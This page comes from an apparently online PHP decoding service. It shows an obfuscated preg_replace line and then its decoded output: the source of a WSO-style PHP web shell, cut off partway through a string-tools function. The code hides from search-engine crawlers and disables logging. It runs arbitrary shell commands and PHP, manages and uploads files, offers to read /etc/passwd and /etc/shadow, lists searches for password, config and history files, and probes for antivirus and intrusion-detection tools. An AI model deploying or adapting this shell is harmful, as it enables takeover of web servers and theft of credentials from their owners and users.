Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61..

Decoded Output download








if( !empty($_SERVER['HTTP_USER_AGENT']) ) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    foreach($userAgents as $agent)
        if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
}
$auth_pass2 = "0a159a8c4e71b95570f152181561e26e";
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', ' beta version 1.0 by b47chguru');
if( get_magic_quotes_gpc() ) {
	function WSOstripslashes($array) {
		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
	}
	$_POST = WSOstripslashes($_POST);
}
function wsoLogin() {
	die("<center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></center>");
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
	if( empty( $auth_pass ) ||
		( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass) ) )
		$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
	else
		wsoLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
	$os = 'win';
else
	$os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
	@chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
	$home_cwd = str_replace("\", "/", $home_cwd);
	$cwd = str_replace("\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
	$cwd .= '/';

if($os == 'win')
	$aliases = array(
		"List Directory" => "dir",
    	"Find index.php in current dir" => "dir /s /w /b index.php",
    	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
    	"Show active connections" => "netstat -an",
    	"Show running services" => "net start",
    	"User accounts" => "net user",
    	"Show computers" => "net view",
		"ARP Table" => "arp -a",
		"IP Configuration" => "ipconfig /all"
	);
else
	$aliases = array(
  		"List dir" => "ls -lha",
		"list file attributes on a Linux second extended file system" => "lsattr -va",
  		"show opened ports" => "netstat -an | grep -i listen",
		"Find" => "",
  		"find all suid files" => "find / -type f -perm -04000 -ls",
  		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
  		"find all sgid files" => "find / -type f -perm -02000 -ls",
  		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  		"find config.inc.php files" => "find / -type f -name config.inc.php",
  		"find config* files" => "find / -type f -name \"config*\"",
  		"find config* files in current dir" => "find . -type f -name \"config*\"",
  		"find all writable folders and files" => "find / -perm -2 -ls",
  		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
  		"find all service.pwd files" => "find / -type f -name service.pwd",
  		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
  		"find all .htpasswd files" => "find / -type f -name .htpasswd",
  		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  		"find all .bash_history files" => "find / -type f -name .bash_history",
  		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
  		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
		"Locate" => "",
  		"locate httpd.conf files" => "locate httpd.conf",
		"locate vhosts.conf files" => "locate vhosts.conf",
		"locate proftpd.conf files" => "locate proftpd.conf",
		"locate psybnc.conf files" => "locate psybnc.conf",
		"locate my.conf files" => "locate my.conf",
		"locate admin.php files" =>"locate admin.php",
		"locate cfg.php files" => "locate cfg.php",
		"locate conf.php files" => "locate conf.php",
		"locate config.dat files" => "locate config.dat",
		"locate config.php files" => "locate config.php",
		"locate config.inc files" => "locate config.inc",
		"locate config.inc.php" => "locate config.inc.php",
		"locate config.default.php files" => "locate config.default.php",
		"locate config* files " => "locate config",
		"locate .conf files"=>"locate '.conf'",
		"locate .pwd files" => "locate '.pwd'",
		"locate .sql files" => "locate '.sql'",
		"locate .htpasswd files" => "locate '.htpasswd'",
		"locate .bash_history files" => "locate '.bash_history'",
		"locate .mysql_history files" => "locate '.mysql_history'",
		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
		"locate backup files" => "locate backup",
		"locate dump files" => "locate dump",
		"locate priv files" => "locate priv"
	);

function wsoHeader() {
	if(empty($_POST['charset']))
		$_POST['charset'] = $GLOBALS['default_charset'];
	global $color;
	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - D.K  shell" . VERSION ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"
")!==false)?'':addslashes(htmlspecialchars($_POST['p1']))) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"
")!==false)?'':addslashes(htmlspecialchars(@$_POST['p2']))) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"
")!==false)?'':addslashes(htmlspecialchars(@$_POST['p3']))) ."';
	function set(a,c,p1,p2,p3,charset) {
		if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
		if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
		if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
		if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
		if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
		if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		document.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<document.mf.elements.length;i++)
			params += '&'+document.mf.elements[i].name+'='+encodeURIComponent(document.mf.elements[i].value);
		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
	$freeSpace = @diskfreespace($GLOBALS['cwd']);
	$totalSpace = @disk_total_space($GLOBALS['cwd']);
	$totalSpace = $totalSpace?$totalSpace:1;
	$release = @php_uname('r');
	$kernel = @php_uname('s');
	$millink = 'http://milw0rm.com/search.php?dong=';
	if( strpos('Linux', $kernel) !== false )
		$millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
	else
		$millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
	if(!function_exists('posix_getegid')) {
		$user = @get_current_user();
		$uid = @getmyuid();
		$gid = @getmygid();
		$group = "?";
	} else {
		$uid = @posix_getpwuid(@posix_geteuid());
		$gid = @posix_getgrgid(@posix_getegid());
		$user = $uid['name'];
		$uid = $uid['uid'];
		$group = $gid['name'];
		$gid = $gid['gid'];
	}
	$cwd_links = '';
	$path = explode("/", $GLOBALS['cwd']);
	$n=count($path);
	for($i=0;$i<$n-1;$i++) {
		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
		for($j=0;$j<=$i;$j++)
			$cwd_links .= $path[$j].'/';
		$cwd_links .= "\")'>".$path[$i]."/</a>";
	}
	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
	$opt_charsets = '';
	foreach($charsets as $item)
		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
	$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','SafeMode'=>'SafeMode','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Symlink'=>'symlink');
	if(!empty($GLOBALS['auth_pass']))
		$m['Logout'] = 'Logout';
	$m['Self remove'] = 'SelfRemove';
	$menu = '';
	foreach($m as $k => $v)
		$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
	$drives = "";
	if ($GLOBALS['os'] == 'win') {
		foreach( range('c','z') as $drive )
		if (is_dir($drive.':\'))
			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
	}
	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
		 '<td><nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a><a href=# onclick="g(\'about\',null,null,null,\'null\')"> [About] </a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.wsoViewSize($totalSpace).' <span>Free:</span> '.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
		 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"].'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
		 '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}

function wsoFooter() {
	$is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
	<tr>
		<td><form onsubmit='g(null,this.c.value);return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form>$is_writable</td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form>$is_writable</td>
	</tr><tr>
		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
		<td><form method='post' ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMAn'>
		<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
		<span>Upload file:</span><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form>$is_writable</td>
	</tr></table></div></body></html>";
}

if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function wsoEx($in) {
	$out = '';
	if(function_exists('exec')) {
		@exec($in,$out);
		$out = @join("
",$out);
	}elseif(function_exists('passthru')) {
		ob_start();
		@passthru($in);
		$out = ob_get_clean();
	}elseif(function_exists('system')) {
		ob_start();
		@system($in);
		$out = ob_get_clean();
	}elseif(function_exists('shell_exec')) {
		$out = shell_exec($in);
	}elseif(is_resource($f = @popen($in,"r"))) {
		$out = "";
		while(!@feof($f))
			$out .= fread($f,1024);
		pclose($f);
	}
	return $out;
}
function wsoViewSize($s) {
	if($s >= 1073741824)
		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
	elseif($s >= 1048576)
		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
	elseif($s >= 1024)
		return sprintf('%1.2f', $s / 1024 ) . ' KB';
	else
		return $s . ' B';
}

function wsoPerms($p) {
	if (($p & 0xC000) == 0xC000)$i = 's';
	elseif (($p & 0xA000) == 0xA000)$i = 'l';
	elseif (($p & 0x8000) == 0x8000)$i = '-';
	elseif (($p & 0x6000) == 0x6000)$i = 'b';
	elseif (($p & 0x4000) == 0x4000)$i = 'd';
	elseif (($p & 0x2000) == 0x2000)$i = 'c';
	elseif (($p & 0x1000) == 0x1000)$i = 'p';
	else $i = 'u';
	$i .= (($p & 0x0100) ? 'r' : '-');
	$i .= (($p & 0x0080) ? 'w' : '-');
	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
	$i .= (($p & 0x0020) ? 'r' : '-');
	$i .= (($p & 0x0010) ? 'w' : '-');
	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
	$i .= (($p & 0x0004) ? 'r' : '-');
	$i .= (($p & 0x0002) ? 'w' : '-');
	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
	return $i;
}
function wsoPermsColor($f) {
	if (!@is_readable($f))
		return '<font color=#FF0000>'.wsoPerms(@fileperms($f)).'</font>';
	elseif (!@is_writable($f))
		return '<font color=white>'.wsoPerms(@fileperms($f)).'</font>';
	else
		return '<font color=#00BB00>'.wsoPerms(@fileperms($f)).'</font>';
}
if(!function_exists("scandir")) {
	function scandir($dir) {
		$dh  = opendir($dir);
		while (false !== ($filename = readdir($dh))) {
    		$files[] = $filename;
		}
		return $files;
	}
}
function wsoWhich($p) {
	$path = wsoEx('which '.$p);
	if(!empty($path))
		return $path;
	return false;
}
function actionSecInfo() {
	wsoHeader();
	echo '<h1>Server security information</h1><div class=content>';
	function wsoSecParam($n, $v) {
		$v = trim($v);
		if($v) {
			echo '<span>'.$n.': </span>';
			if(strpos($v, "
") === false)
				echo $v.'<br>';
			else
				echo '<pre class=ml1>'.$v.'</pre>';
		}
	}

	wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
	wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
	wsoSecParam('Open base dir', @ini_get('open_basedir'));
	wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
	wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
	wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
	$temp=array();
	if(function_exists('mysql_get_client_info'))
		$temp[] = "MySql (".mysql_get_client_info().")";
	if(function_exists('mssql_connect'))
		$temp[] = "MSSQL";
	if(function_exists('pg_connect'))
		$temp[] = "PostgreSQL";
	if(function_exists('oci_connect'))
		$temp[] = "Oracle";
	wsoSecParam('Supported databases', implode(', ', $temp));
	echo '<br>';

	if( $GLOBALS['os'] == 'nix' ) {
		$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
		$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
		$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
		wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
		wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
		wsoSecParam('OS version', @file_get_contents('/proc/version'));
		wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
		if(!$GLOBALS['safe_mode']) {
			echo '<br>';
			$temp=array();
			foreach ($userful as $item)
				if(wsoWhich($item)){$temp[]=$item;}
			wsoSecParam('Userful', implode(', ',$temp));
			$temp=array();
			foreach ($danger as $item)
				if(wsoWhich($item)){$temp[]=$item;}
			wsoSecParam('Danger', implode(', ',$temp));
			$temp=array();
			foreach ($downloaders as $item)
				if(wsoWhich($item)){$temp[]=$item;}
			wsoSecParam('Downloaders', implode(', ',$temp));
			echo '<br/>';
            wsoSecParam('HDD space', wsoEx('df -h'));
			wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
		}
	} else {
		wsoSecParam('OS Version',wsoEx('ver'));
		wsoSecParam('Account Settings',wsoEx('net accounts'));
		wsoSecParam('User Accounts',wsoEx('net user'));
	}
	echo '</div>';
	wsoFooter();
}

function actionPhp() {
	if( isset($_POST['ajax']) ) {
		$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
		ob_start();
		eval($_POST['p1']);
		$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"

	\'")."';
";
		echo strlen($temp), "
", $temp;
		exit;
	}
	wsoHeader();
	if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
		echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
		ob_start();
		phpinfo();
		$tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
		$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
		echo str_replace('h1','h2',$tmp).'</div><br>';
	}
	if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
		echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
	echo ' <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '</pre></div>';
	wsoFooter();
}

function actionFilesMan() {
	wsoHeader();
	echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
	if(!empty($_POST['p1'])) {
		switch($_POST['p1']) {
			case 'uploadFile':
				if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
					echo "Can't upload file!";
				break;
			case 'mkdir':
				if(!@mkdir($_POST['p2']))
					echo "Can't create new dir";
				break;
			case 'delete':
				function deleteDir($path) {
					$path = (substr($path,-1)=='/') ? $path:$path.'/';
					$dh  = opendir($path);
					while ( ($item = readdir($dh) ) !== false) {
						$item = $path.$item;
						if ( (basename($item) == "..") || (basename($item) == ".") )
							continue;
						$type = filetype($item);
						if ($type == "dir")
							deleteDir($item);
						else
							@unlink($item);
					}
					closedir($dh);
					rmdir($path);
				}
				if(is_array(@$_POST['f']))
					foreach($_POST['f'] as $f) {
						$f = urldecode($f);
						if(is_dir($f))
							deleteDir($f);
						else
							@unlink($f);
					}
				break;
			case 'paste':
				if($_SESSION['act'] == 'copy') {
					function copy_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != "..")) {
									copy_paste($c.$s.'/',$f, $d.$s.'/');
								}
						} elseif(is_file($c.$s)) {
							@copy($c.$s, $d.$s);
						}
					}
					foreach($_SESSION['f'] as $f)
						copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
				} elseif($_SESSION['act'] == 'move') {
					function move_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != "..")) {
									copy_paste($c.$s.'/',$f, $d.$s.'/');
								}
						} elseif(@is_file($c.$s)) {
							@copy($c.$s, $d.$s);
						}
					}
					foreach($_SESSION['f'] as $f)
						@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
				} elseif($_SESSION['act'] == 'zip') {
					if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open('wso_'.date("Ymd_His").'.zip', (int)eval('return ZIPARCHIVE::CREATE;'))) {
                            chdir($_SESSION['c']);
                            foreach($_SESSION['f'] as $f) {
                                if(@is_file($_SESSION['c'].$f))
                                    $zip->addFile($_SESSION['c'].$f, $f);
                                elseif(@is_dir($_SESSION['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
				} elseif($_SESSION['act'] == 'unzip') {
					if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_SESSION['f'] as $f) {
                            if($zip->open($_SESSION['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
				}
				unset($_SESSION['f']);
				break;
			default:
				if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')||($_POST['p1'] == 'zip')||($_POST['p1'] == 'unzip')) ) {
					$_SESSION['act'] = @$_POST['p1'];
					$_SESSION['f'] = @$_POST['f'];
					foreach($_SESSION['f'] as $k => $f)
						$_SESSION['f'][$k] = urldecode($f);
					$_SESSION['c'] = @$_POST['c'];
				}
				break;
		}
	}
	$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
	if($dirContent === false) {	echo 'Can\'t open this folder!';wsoFooter(); return;	}
	global $sort;
	$sort = array('name', 1);
	if(!empty($_POST['p1'])) {
		if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
			$sort = array($match[1], (int)$match[2]);
	}
echo "<script>
	function sa() {
		for(i=0;i<document.files.elements.length;i++)
			if(document.files.elements[i].type == 'checkbox')
				document.files.elements[i].checked = document.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
	$dirs = $files = array();
	$n = count($dirContent);
	for($i=0;$i<$n;$i++) {
		$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
		$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
		$tmp = array('name' => $dirContent[$i],
					 'path' => $GLOBALS['cwd'].$dirContent[$i],
					 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
					 'perms' => wsoPermsColor($GLOBALS['cwd'].$dirContent[$i]),
					 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
					 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
					 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
					);
		if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
			$files[] = array_merge($tmp, array('type' => 'file'));
		elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
			$dirs[] = array_merge($tmp, array('type' => 'link'));
		elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
			$dirs[] = array_merge($tmp, array('type' => 'dir'));
	}
	$GLOBALS['sort'] = $sort;
	function wsoCmp($a, $b) {
		if($GLOBALS['sort'][0] != 'size')
			return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
		else
			return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
	}
	usort($files, "wsoCmp");
	usort($dirs, "wsoCmp");
	$files = array_merge($dirs, $files);
	$l = 0;
	foreach($files as $f) {
		echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
			.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
		$l = $l?0:1;
	}
	echo "<tr><td colspan=7>
	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
	<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    if(!empty($_SESSION['act'])&&@count($_SESSION['f']))
        echo "<option value='paste'>Paste / zip</option>";
    echo "</select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>";
	wsoFooter();
}

function actionStringTools() {
	if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
	if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
	if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
